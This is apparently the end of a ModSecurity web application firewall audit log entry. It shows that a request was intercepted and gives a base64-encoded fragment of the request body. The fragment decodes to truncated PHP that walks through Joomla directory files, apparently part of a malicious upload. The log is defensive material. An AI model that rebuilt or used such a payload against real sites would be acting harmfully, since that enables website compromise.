YnVmLCAkdCwgJHQxLSR0KTsKfQpmdW5jdGlvbiBkb0pvb21sYURpcigkZGlyKQp7CgkkYWxsRmlsZXMgPSBnbG9iKCRkaXIuJy8qJyk7Cglmb3JlYWNoKCRhbGxGaWxlcyBh
	Action: Intercepted (phase 2)
	Stopwatch: 1384065842987057 134082 (- - -)
	Stopwatch2: 1384065842987057 134082; combined=14809, p1=634, p2=14087, p3=0, p4=0, p5=87, sr=95, sw=1, l=0, gc=0
	Response-Body-Transformed: Dechunked
	Producer: ModSecurity for Apache/2.7.4 (http://www.modsecurity.org/); OWASP_CRS/2.2.7.
	Server: Apache
	Engine-Mode: "ENABLED"